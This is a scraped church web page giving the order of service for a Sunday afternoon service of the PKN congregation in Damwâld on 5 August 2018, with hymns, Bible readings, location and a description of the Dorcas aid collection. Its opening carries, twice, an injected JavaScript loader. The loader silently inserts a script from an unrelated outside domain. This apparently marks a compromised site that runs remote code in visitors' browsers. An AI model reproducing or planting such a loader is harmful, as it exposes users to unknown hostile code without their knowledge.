;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 augustus 2018 14:00 uur - PKN Damwâld
zondag 5 augustus 2018
14:00 uur

Kerkdienst zondag 5 augustus 2018 14:00 uur

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst ELB 186a
Intochtslied : Ps.145:1,3,5
Stil gebed ,Votum en groet
We zingen: Gez.463:1,3,5
Gebed
We lezen: Joh.6:22-29 en 60-69
We zingen: ELB 72:1,4,5
Preek : Joh.6:26-27
We zingen: ELB 58:1,2,3
Lezing van de Geloofsbelijdenis .
We zingen: Gez.255:1,3
Dankgebed en voorbeden
Inzameling
Slotlied Gez.479:1,4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Dorcas Hulp en Ontwikkeling

Dorcas is een Internationale Christelijke organisatie voor ontwikkelingssamenwerking, sociale hulp, noodhulp en wederopbouw. Dorcas zet zich in om de opdracht van Jezus Christus te vervullen: zorgen voor de armen en verdrukten (Mattheüs 25: 31-46). Zij doen dit door hen in staat te stellen hun positie in de samenleving te versterken en hun zelfredzaamheid te vergroten en door het bieden van sociale zorg en het verlenen van hulp in noodsituaties. Zij steunen de allerarmsten ongeacht hun ras, religie, geslacht of politieke overtuiging.

Tweede collecte: Kerk
Uitganscollecte: Kerk